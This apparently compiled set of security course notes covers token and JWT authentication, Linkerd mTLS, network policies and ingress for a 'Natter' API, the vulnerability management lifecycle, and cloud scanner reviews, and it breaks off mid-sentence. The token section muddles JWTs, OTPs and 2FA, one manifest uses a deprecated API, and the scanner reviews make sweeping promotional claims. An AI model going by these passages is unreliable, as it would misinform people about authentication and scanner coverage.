Due to this rising security burden, two-factor authentication (2FA) came into the picture and introduced token-based authentication. This approach reduces reliance on password systems and adds a second layer of security. Let's jump straight to the mechanism.
But first of all, let's meet the main driver of the process: a T-O-K-E-N!
What is an Authentication Token?
A Token is a computer-generated code that acts as a digitally encoded
signature of a user. They are used to authenticate the identity of a user to
access any website or application network.
A token is classified into two types: A Physical token and a Web token. Let’s
understand them and how they play an important role in security.
• Physical token: A physical token uses a tangible device to store a user's
information. Here, the secret key is a physical device that can be used
to prove the user's identity. The two kinds of physical tokens are hard
tokens and soft tokens. Hard tokens use smart cards and USB devices to
grant access to restricted networks, such as the corporate networks that
employees use at the office. Soft tokens use a mobile phone or computer
to send an encrypted code (like an OTP) via an authorized app or SMS.
• Web token: The authentication via web token is a fully digital
process. Here, the server and the client interface interact upon the
user’s request. The client sends the user credentials to the server and
the server verifies them, generates the digital signature, and sends it
back to the client. Web tokens are popularly known as JSON Web
Token (JWT), a standard for creating digitally signed tokens.
The word "token" is also popular in today's digital climate around decentralized cryptography, where related terms include DeFi tokens, governance tokens, non-fungible tokens, and security tokens. Authentication tokens, for their part, are based on encryption and digital signatures, which makes them difficult to forge.
What is Token-based Authentication?
Token-based authentication is a two-step authentication strategy that enhances the security mechanism users go through to access a network. Once users register their credentials, they receive a unique encrypted token that is valid for a specified session time. During this session, users can directly access the website or application without logging in again. It enhances the user experience by saving time and improves security by adding a layer on top of the password system.
A token is stateless: it does not require the server to save information about the user in a database for every request. The system is based on cryptography, and once the session is complete the token is destroyed. This gives tokens an advantage over passwords, which attackers can steal and reuse to access resources.
The most familiar example of a token is the OTP (One-Time Password), which is used to verify the identity of the right user before granting network entry and is typically valid for 30-60 seconds. During the session, the token is stored in the organization's database and vanishes when the session expires.
Let's understand some important drivers of token-based authentication:
• User: A person who intends to access the network, carrying his/her username and password.
• Client-server: The front-end login interface where the user first interacts to request the restricted resource.
• Authorization server: A back-end unit that handles the task of verifying the credentials, generating tokens, and sending them to the user.
• Resource server: The entry point where the user presents the access token. If it is verified, the network greets the user with a welcome note.
How does Token-based Authentication work?
Token-based authentication has become a widely used security mechanism that internet service providers rely on to offer users a quick experience without compromising the security of their data. Let's understand how this mechanism works in four easy-to-grasp steps.

1. Request: The user attempts to enter the service with login credentials on the application or website interface. The credentials may involve a username, password, smart card, or biometrics.
2. Verification: The login information is sent from the client-server to the authentication server, which verifies that a valid user is trying to enter the restricted resource. If the credentials pass verification, the server generates a secret digital key and sends it to the user over HTTP in the form of a token. The token is sent in the open-standard JWT format (a sketch of creating and verifying one follows these steps), which includes:
• Header: Specifies the type of token and the signing algorithm.
• Payload: Contains claims about the user and other data.
• Signature: Lets the recipient verify that the token was issued by a trusted party and that the transmitted messages have not been tampered with.
3. Token validation: The user receives the token and presents it to the resource server to gain access to the network. An access token delivered as an OTP is typically valid for only 30-60 seconds, and if it expires before use the user can request a refresh token from the authentication server. There is also a limit on the number of attempts a user can make to gain access, which prevents brute-force attacks based on trial and error.
4. Storage: Once the resource server has validated the token and granted access to the user, it stores the token in a database for the defined session time. The session time differs for every website or app; banking applications, for example, have the shortest session times of only a few minutes.
These steps explain how token-based authentication works and which drivers power the whole security process.
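As referenced in step 2, a JWT carries a header, payload, and signature. The sketch below uses the third-party PyJWT library to create and verify an HMAC-signed token; the secret, claims, and five-minute lifetime are illustrative values only.

```python
import datetime
import jwt  # PyJWT: pip install pyjwt

SECRET = "change-me"  # illustrative shared secret; use a strong, private key in practice

def issue_token(username: str) -> str:
    payload = {
        "sub": username,  # who the token was issued for
        "exp": datetime.datetime.now(datetime.timezone.utc)
        + datetime.timedelta(minutes=5),  # short-lived token
    }
    # The header ({"alg": "HS256", "typ": "JWT"}) is added automatically.
    return jwt.encode(payload, SECRET, algorithm="HS256")

def verify_token(token: str) -> str | None:
    try:
        claims = jwt.decode(token, SECRET, algorithms=["HS256"])  # checks signature and expiry
        return claims["sub"]
    except jwt.InvalidTokenError:
        return None

if __name__ == "__main__":
    t = issue_token("alice")
    print(t.count("."))           # 2: header.payload.signature
    print(verify_token(t))        # "alice"
    print(verify_token(t + "x"))  # None: tampered token fails verification
```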
Note: Today, with growing innovation, security regulations are becoming stricter to ensure that only the right people have access to resources. Tokens are therefore occupying more space in the security process because they store information in encrypted form and work on both websites and applications, helping maintain and scale the user experience. Hopefully this section gave you the know-how of token-based authentication and how it helps ensure that crucial data is not misused.
SECURING NATTER APIS
SECURING MICROSERVICE APIS: SERVICE MESH

Overview
Securing microservice communications is crucial to prevent attackers from
intercepting and manipulating network traffic. Traditional network
segmentation techniques are not effective within dynamic Kubernetes
environments. Instead, using TLS (Transport Layer Security) and service
meshes like Linkerd or Istio can significantly enhance security.

Importance of Securing Communications


1. Prevent Data Interception: Even if containers are secure, attackers can still
intercept communications between services and databases.
2. Network Snooping Risks: Without segmentation, attackers can monitor all
internal communications, capturing sensitive data like passwords.
3. Mitigate Network Attacks: TLS helps prevent various network attacks such
as DNS rebind attacks, DNS cache poisoning, and ARP spoofing.

TLS and Public Key Infrastructure (PKI)


1. TLS Encryption: Ensures data is encrypted during transit, preventing
unauthorized access.
2. PKI Components:
- Certificates: Issued to services for establishing TLS connections.
- Private Keys: Kept secure to maintain the integrity of communications.
- Certificate Authority (CA): Issues and manages certificates. Can be a
hierarchy with root and intermediate CAs for enhanced security.
- Certificate Revocation: Certificates must be revoked if compromised,
managed via Certificate Revocation Lists (CRLs) or Online Certificate Status
Protocol (OCSP).

Challenges with Manual PKI


Managing a PKI manually is complex due to the need for secure key
distribution, certificate issuance, revocation, and renewal. Automated tools
like Cloudflare’s PKI toolkit and Hashicorp Vault can help but require
significant integration efforts.

Service Mesh for Simplified TLS Management


A service mesh simplifies the deployment and management of TLS in
Kubernetes. It provides a variety of benefits:
1. Proxy Sidecar Containers: Injected into each pod to handle TLS encryption
and decryption.
2. Automatic Certificate Management: The service mesh's control plane issues
and manages certificates for proxies.
3. Transparent Upgrades: Services communicate normally (e.g., via HTTP),
while the proxies automatically upgrade to HTTPS.

Installing and Configuring Linkerd


Linkerd is a simpler service mesh compared to Istio, making it suitable for
straightforward use cases:
1. Installation Steps:
- Install the Linkerd CLI.
- Run pre-installation checks (`linkerd check --pre`).
- Install Linkerd (`linkerd install | kubectl apply -f -`).
- Verify installation (`linkerd check`).

2. Enabling Linkerd in a Namespace:


- Add the `linkerd.io/inject: enabled` annotation to the namespace YAML
file.
- Apply the updated namespace definition.
- Restart deployments to inject Linkerd proxies.

3. Monitoring with Linkerd Tap:


- Use the `linkerd tap` command to monitor network requests and verify TLS
usage.

Example Configuration
To enable Linkerd for the Natter API, you would:
1. Update Namespace YAML:
```yaml
apiVersion: v1
kind: Namespace
metadata:
  name: natter-api
  labels:
    name: natter-api
  annotations:
    linkerd.io/inject: enabled
```
- Apply the configuration: `kubectl apply -f kubernetes/natter-namespace.yaml`
- Restart deployments to enable sidecar injection:
```bash
kubectl rollout restart deployment natter-database-deployment -n natter-api
kubectl rollout restart deployment link-preview-deployment -n natter-api
kubectl rollout restart deployment natter-api-deployment -n natter-api
```

2. Monitor Traffic:
- Run `linkerd tap ns/natter-api` to observe network traffic and verify TLS
implementation.

Future Enhancements
Linkerd currently only upgrades HTTP traffic to use TLS. For other protocols,
manual TLS setup is required. However, Istio supports automatic TLS for non-
HTTP traffic and may be preferred for more complex environments.

Summary
Using a service mesh like Linkerd or Istio provides a robust solution for
securing microservice communications in Kubernetes environments. By
automating TLS encryption and certificate management, service meshes
ensure secure and reliable communication between services, greatly enhancing
the overall security posture of your microservice architecture.
SECURING MICROSERVICE APIS: LOCKING DOWN NETWORK
CONNECTIONS

When securing microservices in a Kubernetes cluster, enabling TLS ensures that communications between services are encrypted, preventing
eavesdropping and tampering. However, TLS alone does not prevent
unauthorized access within the cluster. An attacker who compromises one
service could still attempt to access other services. This is known as lateral
movement. To mitigate this risk, network connections must be locked down
using network policies.

Understanding Lateral Movement

Lateral movement is the process where an attacker moves from one compromised service to another within the network, attempting to expand their
control and find new vulnerabilities. This tactic can be explored further
through frameworks like [MITRE ATT&CK](https://attack.mitre.org).

Using Network Policies

Network policies in Kubernetes define which pods can communicate with each
other. These policies can control both ingress (incoming traffic) and egress
(outgoing traffic).

Key Components of a Network Policy:


1. Pod Selector: Specifies the pods the policy applies to.
2. Policy Types: Defines whether the policy controls ingress, egress, or both.
3. Ingress Rules: Specifies which pods or IP ranges can send traffic to the
selected pods and on which ports.
4. Egress Rules: Specifies where the selected pods can send traffic and on
which ports.

Example Network Policy

Consider a scenario where you need to secure the H2 database in the `natter-
api` namespace. The following network policy allows only the `natter-api`
pods to connect to the H2 database on port 9092 and blocks all outbound
connections from the database pod.

```yaml
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: database-network-policy
  namespace: natter-api
spec:
  podSelector:
    matchLabels:
      app: natter-database
  policyTypes:
    - Ingress
    - Egress
  ingress:
    - from:
        - podSelector:
            matchLabels:
              app: natter-api
      ports:
        - protocol: TCP
          port: 9092
```

Explanation:
- Pod Selector: Targets pods labeled `app: natter-database`.
- Policy Types: Applies both ingress and egress rules.
- Ingress Rule: Allows traffic to port 9092 from pods labeled `app: natter-api`.
- Egress Rule: Not defined, so all outgoing connections are blocked.

Applying Network Policies

To apply the network policy, use the `kubectl apply -f` command. However,
note that some environments like Minikube may not support network policies
out of the box. Most cloud providers (e.g., Google, Amazon, Microsoft) and
self-hosted Kubernetes clusters with network plugins like Calico or Cilium do
support these policies.

Enhancing Security with Service Mesh

In addition to network policies, service meshes like Istio offer advanced network authorization. They can define policies based on the service identities
within mTLS (mutual TLS) certificates, allowing more granular control over
inter-service communications.

Advantages of Service Mesh Authorization:


- Controls access based on HTTP methods and paths.
- Enforces consistent security policies across the cluster.
Limitations:
- Does not replace API-level authorization mechanisms.
- Limited protection against Server-Side Request Forgery (SSRF) attacks, as
proxies authenticate requests transparently.

Conclusion

Locking down network connections is crucial for securing microservice APIs in Kubernetes. By implementing network policies, you restrict which pods can
communicate with each other, reducing the risk of lateral movement by
attackers. For more advanced and granular control, consider integrating a
service mesh, which provides additional security features and network
authorization capabilities. Together, these measures help create a more secure
and resilient microservice architecture.

SECURING MICROSERVICE APIS: SECURING INCOMING REQUESTS

Securing communications within a Kubernetes cluster is crucial, but it's equally important to secure the requests entering the cluster from external
sources. This is typically achieved using an ingress controller, which acts as a
gateway for all external traffic. Below is a detailed guide on how to secure
incoming requests to your microservice APIs.

Understanding Ingress Controllers

Ingress Controller: A Kubernetes ingress controller is a reverse proxy or load balancer that manages incoming requests from external clients. It provides a
unified API for multiple services and often functions as an API gateway,
performing tasks such as TLS termination, rate-limiting, and audit logging.

Benefits:
- TLS Termination: Encrypts incoming connections to secure data in transit.
- Rate-Limiting: Prevents abuse by limiting the number of requests from
clients.
- Audit Logging: Records requests for monitoring and troubleshooting.

Enabling an Ingress Controller in Minikube

To enable an ingress controller in Minikube, follow these steps:

1. Annotate the `kube-system` Namespace for mTLS:


Ensure the new ingress pod is part of the Linkerd service mesh for automatic
HTTPS upgrades.
```sh
kubectl annotate namespace kube-system linkerd.io/inject=enabled
```

2. Enable the Ingress Add-on:


Start the NGINX ingress controller within Minikube.
```sh
minikube addons enable ingress
```

3. Monitor the Ingress Controller Pod:


Check the progress of the ingress controller starting up.
```sh
kubectl get pods -n kube-system --watch
```

Configuring the Ingress Controller

Create an Ingress resource to route requests to your services and enable TLS:

1. Create the Ingress Configuration File:


Define how HTTP requests should be mapped to services within your
namespace.
```yaml
apiVersion: extensions/v1beta1
kind: Ingress
metadata:
  name: api-ingress
  namespace: natter-api
  annotations:
    nginx.ingress.kubernetes.io/upstream-vhost:
      "$service_name.$namespace.svc.cluster.local:$service_port"
spec:
  tls:
    - hosts:
        - api.natter.local
      secretName: natter-tls
  rules:
    - host: api.natter.local
      http:
        paths:
          - backend:
              serviceName: natter-api-service
              servicePort: 4567
```

2. Generate TLS Certificates:


Use `mkcert` to create a TLS certificate for development.
```sh
mkcert api.natter.local
```

3. Create a Kubernetes Secret for the Certificate:


Store the TLS certificate and key in a Kubernetes secret.
```sh
kubectl create secret tls natter-tls -n natter-api \
  --key=api.natter.local-key.pem --cert=api.natter.local.pem
```

4. Apply the Ingress Configuration:


Deploy the ingress configuration to the cluster.
```sh
kubectl apply -f kubernetes/natter-ingress.yaml
```

Verifying the Setup

Make an HTTPS request to the API to ensure it is secured:


```sh
curl https://api.natter.local/users \
  -H 'Content-Type: application/json' \
  -d '{"username":"abcde","password":"password"}'
```
You should receive a response indicating the request was successful.

Checking the Status with Linkerd

Use Linkerd's tap utility to verify that the requests are secured with mTLS:
```sh
linkerd tap ns/natter-api
```

Look for the `tls=true` flag in the output to confirm that mTLS is enabled.

Automating Certificate Management in Production

For production environments, consider using `cert-manager` to automate certificate management:
- Obtain certificates from public CAs like Let’s Encrypt or from private
organizational CAs.
- Automatically renew and manage certificates without manual intervention.

Summary

By configuring an ingress controller, you ensure that incoming requests to your Kubernetes cluster are effectively managed and secured. The ingress
controller can handle TLS termination, route requests to the appropriate
services, and enforce security measures such as rate-limiting and audit
logging. Integrating the ingress controller with a service mesh like Linkerd
further enhances security by enabling mTLS for internal communications. This
comprehensive approach to securing incoming requests helps protect your
microservices from external threats while maintaining robust internal security
controls.
UNIT-4

VULNERABILITY ASSESSMENT LIFECYCLE

Every month, the National Institute of Standards and Technology (NIST) adds
over 2,000 new security vulnerabilities to the National Vulnerability Database.
Security teams don’t need to track all of these vulnerabilities, but they do need a
way to identify and resolve the ones that pose a potential threat to their systems.
That’s what the vulnerability management lifecycle is for.
The vulnerability management lifecycle is a continuous process for discovering,
prioritizing and addressing vulnerabilities in a company’s IT assets.
A typical round of the lifecycle has five stages:
1. Asset inventory and vulnerability assessment.
2. Vulnerability prioritization.
3. Vulnerability resolution.
4. Verification and monitoring.
5. Reporting and improvement.
The vulnerability management lifecycle allows organizations to improve
security posture by taking a more strategic approach to vulnerability
management. Instead of reacting to new vulnerabilities as they appear, security
teams actively hunt for flaws in their systems. Organizations can identify the
most critical vulnerabilities and put protections in place before threat actors strike.

Why does the vulnerability management lifecycle matter?


A vulnerability is any security weakness in the structure, function or
implementation of a network or asset that hackers can exploit to harm a
company.
Vulnerabilities can arise from fundamental flaws in an asset’s construction.
Such was the case with the infamous Log4J vulnerability, where coding errors
in a popular Java library allowed hackers to remotely run malware on victims’
computers. Other vulnerabilities are caused by human error, like a
misconfigured cloud storage bucket that exposes sensitive data to the public
internet.
Every vulnerability is a risk for organizations. According to IBM’s X-Force
Threat Intelligence Index, vulnerability exploitation is the second most
common cyberattack vector. X-Force also found that the number of new
vulnerabilities increases every year, with 23,964 recorded in 2022 alone.
Hackers have a growing stockpile of vulnerabilities at their disposal. In
response, enterprises have made vulnerability management a key component of
their cyber risk management strategies. The vulnerability management lifecycle
offers a formal model for effective vulnerability management programs in an
ever-changing cyberthreat landscape. By adopting the lifecycle, organizations
can see some of the following benefits:
• Proactive vulnerability discovery and resolution: Businesses often
don’t know about their vulnerabilities until hackers have exploited them.
The vulnerability management lifecycle is built around continuous
monitoring so security teams can find vulnerabilities before adversaries
do.
• Strategic resource allocation: Tens of thousands of new vulnerabilities
are discovered yearly, but only a few are relevant to an organization. The
vulnerability management lifecycle helps enterprises pinpoint the most
critical vulnerabilities in their networks and prioritize the biggest risks for
remediation.
• A more consistent vulnerability management process: The
vulnerability management lifecycle gives security teams a repeatable
process to follow, from vulnerability discovery to remediation and
beyond. A more consistent process produces more consistent results, and
it enables companies to automate key workflows like asset inventory,
vulnerability assessment and patch management.

Stages of the vulnerability management lifecycle


New vulnerabilities can arise in a network at any time, so the vulnerability
management lifecycle is a continuous loop rather than a series of distinct events.
Each round of the lifecycle feeds directly into the next. A single round usually
contains the following stages:

Stage 0: Planning and prework


Technically, planning and prework happen before the vulnerability management
lifecycle, hence the “Stage 0” designation. During this stage, the organization
irons out critical details of the vulnerability management process, including the
following:
• Which stakeholders will be involved, and the roles they will have
• Resources—including people, tools, and funding—available for
vulnerability management
• General guidelines for prioritizing and responding to vulnerabilities
• Metrics for measuring the program’s success
Organizations don’t go through this stage before every round of the lifecycle.
Generally, a company conducts an extensive planning and prework phase before
it launches a formal vulnerability management program. When a program is in
place, stakeholders periodically revisit planning and prework to update their
overall guidelines and strategies as needed.

Stage 1: Asset discovery and vulnerability assessment


The formal vulnerability management lifecycle begins with an asset
inventory—a catalog of all the hardware and software on the organization’s
network. The inventory includes officially sanctioned apps and endpoints and
any shadow IT assets employees use without approval.
Because new assets are constantly added to company networks, the asset
inventory is updated before every round of the lifecycle. Companies often use
software tools like attack surface management platforms to automate their
inventories.
After identifying assets, the security team assesses them for vulnerabilities. The
team can use a combination of tools and methods, including automated
vulnerability scanners, manual penetration testing and external threat
intelligence from the cybersecurity community.
Assessing every asset during every round of the lifecycle would be onerous, so
security teams usually work in batches. Each round of the lifecycle focuses on a
specific group of assets, with more critical asset groups receiving scans more
often. Some advanced vulnerability scanning tools continuously assess all
network assets in real-time, enabling the security team to take an even more
dynamic approach to vulnerability discovery.

Stage 2: Vulnerability prioritization


The security team prioritizes the vulnerabilities they found in the assessment
stage. Prioritization ensures that the team addresses the most critical
vulnerabilities first. This stage also helps the team avoid pouring time and
resources into low-risk vulnerabilities.
To prioritize vulnerabilities, the team considers these criteria:
• Criticality ratings from external threat intelligence: This can include
MITRE’s list of Common Vulnerabilities and Exposures (CVE) or
the Common Vulnerability Scoring System (CVSS).
• Asset criticality: A noncritical vulnerability in a critical asset often
receives higher priority than a critical vulnerability in a less important
asset.
• Potential impact: The security team weighs what might happen if
hackers exploited a particular vulnerability, including the effects on
business operations, financial losses and any possibility of legal action.
• Likelihood of exploitation: The security team pays more attention to
vulnerabilities with known exploits that hackers actively use in the wild.
• False positives: The security team ensures that vulnerabilities actually
exist before dedicating any resources to them.
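As a rough illustration of how these criteria can be combined, the sketch below computes a weighted priority score from a CVSS base score, an asset-criticality rating, and an exploit-availability flag. The weights, scale, and findings are arbitrary assumptions for demonstration, not a standard formula.

```python
def priority_score(cvss: float, asset_criticality: int, exploit_in_wild: bool) -> float:
    """Toy prioritization: CVSS (0-10), asset criticality (1-5), known-exploit flag."""
    score = cvss * 10                                 # base severity scaled to 0-100
    score *= 1 + 0.15 * (asset_criticality - 1)       # boost findings on important assets
    if exploit_in_wild:
        score *= 1.5                                  # active exploitation raises urgency
    return round(min(score, 100.0), 1)

findings = [
    ("Outdated TLS library on payment service", 9.8, 5, True),
    ("Verbose error messages on internal wiki", 5.3, 2, False),
    ("Weak cipher on legacy test server", 7.5, 1, False),
]

# Work the list from highest to lowest priority (the order used in Stage 3).
for name, cvss, crit, wild in sorted(findings, key=lambda f: -priority_score(*f[1:])):
    print(f"{priority_score(cvss, crit, wild):5.1f}  {name}")
```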

Stage 3: Vulnerability resolution


The security team works through the list of prioritized vulnerabilities, from
most critical to least critical. Organizations have three options to address
vulnerabilities:
1. Remediation: Fully addressing a vulnerability so it can no longer be
exploited, such as by patching an operating system bug, fixing a
misconfiguration or removing a vulnerable asset from the network.
Remediation isn’t always feasible. For some vulnerabilities, complete
fixes aren’t available at the time of discovery (e.g., zero-day
vulnerabilities). For other vulnerabilities, remediation would be too
resource-intensive.
2. Mitigation: Making a vulnerability more difficult to exploit or lessening
the impact of exploitation without removing the vulnerability entirely.
For example, adding stricter authentication and authorization measures to
a web application would make it harder for hackers to hijack accounts.
Crafting incident response plans for identified vulnerabilities can soften
the blow of cyberattacks. Security teams usually choose to mitigate when
remediation is impossible or prohibitively expensive.
3. Acceptance: Some vulnerabilities are so low-impact or unlikely to be
exploited that fixing them wouldn’t be cost-effective. In these cases, the
organization can choose to accept the vulnerability.
Stage 4: Verification and monitoring
To verify that mitigation and remediation efforts worked as intended, the
security team rescans and retests the assets they just worked on. These audits
have two primary purposes: to determine if the security team successfully
addressed all known vulnerabilities and ensure that mitigation and remediation
didn’t introduce any new problems.
As part of this reassessment stage, the security team also monitors the network
more broadly. The team looks for any new vulnerabilities since the last scan,
old mitigations that have grown obsolete, or other changes that may require
action. All of these findings help inform the next round of the lifecycle.

Stage 5: Reporting and improvement


The security team documents activity from the most recent round of the
lifecycle, including vulnerabilities found, resolution steps taken and outcomes.
These reports are shared with relevant stakeholders, including executives, asset
owners, compliance departments and others.
The security team also reflects on how the most recent round of the lifecycle
went. The team may look at key metrics like mean time to detect (MTTD),
mean time to respond (MTTR), total number of critical vulnerabilities and
vulnerability recurrence rates. By tracking these metrics over time, the security
team can establish a baseline for the vulnerability management program’s
performance and identify opportunities to improve the program over time.
Lessons learned from one round of the lifecycle can make the next round more
effective.

CLOUD BASED VULNERABILITY SCANNERS - I

Vulnerability management is a complex undertaking. Even with a formal lifecycle, security teams might feel like they’re hunting for needles in haystacks as they try to track down vulnerabilities in massive corporate networks.

Scanning for cloud-based vulnerabilities is an essential cybersecurity practice in the tech world.

Network operators deploy basic security measures when managing a network, but some hidden vulnerabilities can be difficult to detect. Hence, the need for automated cloud security scans arises.
Tech enthusiasts are expected to be able to perform basic vulnerability scanning of the cloud environment. This process starts with learning about cloud security scanning tools that can help automate the detection of cloud vulnerabilities on a network.

Several vulnerability scanners are available at little to no cost, but it is essential to know the most efficient ones.

What is a Vulnerability Scanner?

A Vulnerability Scanner is a software tool designed to examine applications and networks for misconfigurations and security flaws automatically. These scanning tools perform automated security tests to identify security threats in a cloud network.

In addition, they have a constantly updated database of cloud vulnerabilities that allows them to conduct effective security scanning.

How to Select the Right Vulnerability Scanner

It is essential to use a suitable vulnerability scanner for cloud security. Many vulnerability scanning tools are available on the internet, but not all will offer what cloud security testers are looking for in automated vulnerability scanners.

So, here are some factors to look out for when selecting a vulnerability scanning tool.

Select a vulnerability scanner that:

• scans complex web applications
• monitors critical systems and defenses
• recommends remediation for vulnerabilities
• complies with regulations and industry standards
• has an intuitive dashboard that displays risk scores

It is essential to compare and review tools used in scanning and testing cloud
vulnerabilities. They offer unique benefits that ensure system networks and web
applications run smoothly and are safe for use in organizations and private
businesses.

Vulnerability scanning tools offer cloud monitoring and security protection benefits such as:

• Scanning systems and networks for security vulnerabilities
• Performing ad-hoc security tests whenever they are needed
• Tracking, diagnosing, and remediating cloud vulnerabilities
• Identifying and resolving wrong configurations in networks

Here are the top 5 vulnerability scanners for cloud security:

Intruder Cloud Security

Intruder is a cloud vulnerability scanning tool specially designed for scanning AWS, Azure, and Google Cloud. This is a highly proactive cloud-based vulnerability scanner that detects every form of cybersecurity weakness in digital infrastructures.

Intruder is highly efficient because it finds cybersecurity weaknesses in exposed systems to avoid costly data breaches.

The strength of this vulnerability scanner for cloud-based systems is in its perimeter scanning abilities. It is designed to discover new vulnerabilities to ensure the perimeter can't be easily breached or hacked. In addition, it adopts a streamlined approach to bug and risk detection.

Hackers will find it exceedingly difficult to breach a network if the Intruder Cloud Security Scanner is used. It will detect all the weaknesses in a cloud network to help prevent hackers from finding those weaknesses.

Intruder also offers a unique threat interpretation system that makes the process of identifying and managing vulnerabilities an easy nut to crack. It is highly recommended.

Aqua Cloud Security

Aqua Cloud Security is a vulnerability scanner designed for scanning, monitoring, and remediating configuration issues in public cloud accounts
according to best practices and compliance standards across cloud-based
platforms such as AWS, Azure, Oracle Cloud, and Google Cloud.

It offers a complete Cloud-Native Application Protection Platform.

This is one of the best vulnerability scanners used for cloud-native security in
organizations. Network security operators use this vulnerability scanner for
vulnerability scanning, cloud security posture management, dynamic threat
analysis, Kubernetes security, serverless security, container security, virtual
machine security, and cloud-based platform integrations.
Aqua Cloud Security Scanner offers users different CSPM editions that
include SaaS and Open-Source Security. It helps secure the configuration of
individual public cloud services with CloudSploit and performs comprehensive
solutions for multi-cloud security posture management.

Mistakes are almost inevitable within a complex cloud environment, and if not adequately checked, they can lead to misconfigurations that escalate into serious security issues.

Hence, Aqua Cloud Security devised a comprehensive approach to prevent data breaches.

Qualys Cloud Security

Qualys Cloud Security is an excellent cloud computing platform designed to identify, classify, and monitor cloud vulnerabilities while ensuring compliance
with internal and external policies.

This vulnerability scanner prioritizes scanning and remediation by automatically finding and eradicating malware infections on web applications and system
websites.

Qualys provides public cloud integrations that allow users to have total
visibility of public cloud deployments.

Most public cloud platforms operate on a “shared security responsibility” model, which means users are expected to protect their workload in the cloud. This can be a daunting task if done manually, so most users would rather employ vulnerability scanners.

Qualys provides complete visibility with end-to-end IT security and compliance with hybrid IT and AWS deployments. It continuously monitors and assesses
AWS assets and resources for security issues, misconfigurations, and non-
standard deployments.

It is the perfect vulnerability scanner for scanning cloud environments and detecting vulnerabilities in complex internal networks.

It has a central single-pane-of-glass interface and CloudView dashboard that allows users to view monitored web apps and all AWS assets across multiple
accounts through a centralized UI.
Rapid7 Insight Cloud Security

Rapid7 InsightCloudSec platform is one of the best vulnerability scanners for cloud security. This vulnerability scanner is designed to keep cloud services secure.

It features an insight platform that provides web application security, vulnerability management, threat command, bug detection, and response, including cloud security expert management and consulting services.

The secure cloud services provided by Rapid7 InsightCloudSec help to drive the
business forward in the best possible ways. It also enables users to drive
innovation through continuous security and compliance.

This cloud security platform offers excellent benefits, including cloud workload
protection, security posture management, and identity and access management.

Rapid7 is a fully integrated cloud-native platform that offers features such as risk assessment and auditing, unified visibility and monitoring, automation and real-time remediation, governance of cloud identity and access management, threat protection, an extensible platform, infrastructure-as-code security, Kubernetes security guardrails, and posture management. The list is endless.

CrowdStrike Cloud Security

CrowdStrike Cloud Security is a top vulnerability scanner designed for cloud security services. It stops cloud breaches with unified cloud security posture management and breach prevention for multi-cloud and hybrid environments in a single platform.

This platform has transformed how cloud security automation is carried out for
web applications and networks.

CrowdStrike offers full-stack cloud-native security and protects workloads, hosts, and containers. It enables DevOps to detect and fix issues before they impact a system negatively.

In addition, security teams can use this cloud security scanner to defend against
cloud breaches using cloud-scale data and analytics.

This vulnerability scanner will create less work for cloud security and DevOps
teams because cloud deployments are automatically optimized with unified
protection.
Its features include automated cloud vulnerability discovery, detecting and
preventing threats, and continuous runtime protection, including EDR for cloud
workloads and containers.

Furthermore, it allows web developers to build and run web applications knowing they are fully protected from a data breach. As a result, when threats are hunted and eradicated, cloud applications will run smoothly and faster while working with the utmost efficiency.

Conclusion

Vulnerability scanners are essential for cloud security because they can easily
detect system weaknesses and prioritize effective fixes. This will help reduce
the workload on security teams in organizations. Each of the vulnerability
scanners reviewed in this guide offers excellent benefits.

These vulnerability scanners allow users to perform scans by logging into the
website as authorized users. When this happens, it automatically monitors and
scans areas of weakness in the systems.

It also identifies any form of anomalies in a network packet configuration to block hackers from exploiting system programs. Automated vulnerability assessment is very crucial for cloud security services.

So, vulnerability scanners can detect thousands of vulnerabilities and identify the actual risk of these vulnerabilities by validating them.

Once these have been achieved, they then prioritize remediation based on the
risk level of these vulnerabilities. All five vulnerability scanners reviewed are
tested and trusted, so users do not need to worry about any form of deficiency.
CLOUD-BASED VULNERABILITY SCANNERS - II
The realm of cloud computing is a double-edged sword. While it offers
unparalleled scalability, agility, and cost-effectiveness, security remains
paramount. In this ever-evolving landscape, cloud-based vulnerability scanners
emerge as our digital guardians, relentlessly identifying weaknesses and
safeguarding our cloud environment. Let's embark on a detailed exploration of
these essential tools, delving into their intricate mechanisms, diverse
applications, and the distinct types available.
Mechanism: Unveiling the Inner Workings
Imagine a meticulous security guard equipped with a comprehensive security
handbook. Cloud vulnerability scanners function in a similar manner,
employing a multi-layered approach:
• Database Matchup: A Catalog of Threats: Scanners possess a vast
database, meticulously curated with known vulnerabilities. These
vulnerabilities, often referred to as Common Vulnerabilities and
Exposures (CVEs), represent security loopholes in software and systems.
The scanner meticulously compares your cloud environment's
configuration and software versions against this extensive database. Any
potential matches are flagged, alerting you to potential security risks.
• Probing and Inspection: Mimicking the Attacker: Cloud vulnerability
scanners don't just sit passively. They actively probe your cloud
resources, simulating the actions of a potential attacker. By mimicking
various attack techniques, the scanner analyzes the system's responses
and identifies weaknesses that could be exploited if left unaddressed.
• Configuration Scrutiny: Eliminating Misconfiguration Nightmares:
Improper configurations are a security Achilles' heel. Cloud vulnerability
scanners meticulously examine your cloud settings, searching for
deviations from established security best practices. These deviations can
expose vulnerabilities that attackers can easily exploit. By identifying
these misconfigurations, scanners empower you to rectify them and
fortify your cloud environment.
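The database-matchup step can be pictured as comparing an inventory of installed software against a vulnerability feed. The Python sketch below is deliberately simplified: the package names, versions, and CVE identifiers are made up, and real scanners match against version ranges rather than exact versions.

```python
# Hypothetical installed-software inventory collected from a cloud instance.
inventory = {"openssl": "1.1.1k", "nginx": "1.18.0", "redis": "6.2.7"}

# Hypothetical vulnerability feed: (package, affected version, CVE id, severity).
vuln_feed = [
    ("openssl", "1.1.1k", "CVE-EXAMPLE-0001", "HIGH"),
    ("nginx", "1.16.1", "CVE-EXAMPLE-0002", "MEDIUM"),
    ("redis", "6.2.7", "CVE-EXAMPLE-0003", "LOW"),
]

def match_vulnerabilities(installed: dict[str, str]) -> list[tuple[str, str, str]]:
    """Flag inventory entries whose installed version appears in the feed."""
    findings = []
    for package, affected_version, cve, severity in vuln_feed:
        if installed.get(package) == affected_version:
            findings.append((cve, package, severity))
    return findings

for cve, package, severity in match_vulnerabilities(inventory):
    print(f"{severity:6} {cve}: update {package}")
```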

The Benefits: A Shield Against Cyber Threats


Cloud vulnerability scanners offer a multitude of advantages, acting as a shield
against cyber threats:
• Proactive Defense: Patching Before the Storm: By proactively
identifying vulnerabilities before malicious actors do, you gain a
significant advantage. With this knowledge, you can promptly apply
security patches, significantly reducing the risk of a security breach.
• Efficiency and Automation: Replacing Manual Drudgery: Manual
security audits are time-consuming and prone to human error. Cloud
vulnerability scanners automate the entire process, saving your security
team valuable time and resources. They can perform comprehensive
scans at regular intervals, ensuring your cloud environment remains
constantly vigilant.
• Improved Compliance: Aiding Regulatory Harmony: Many
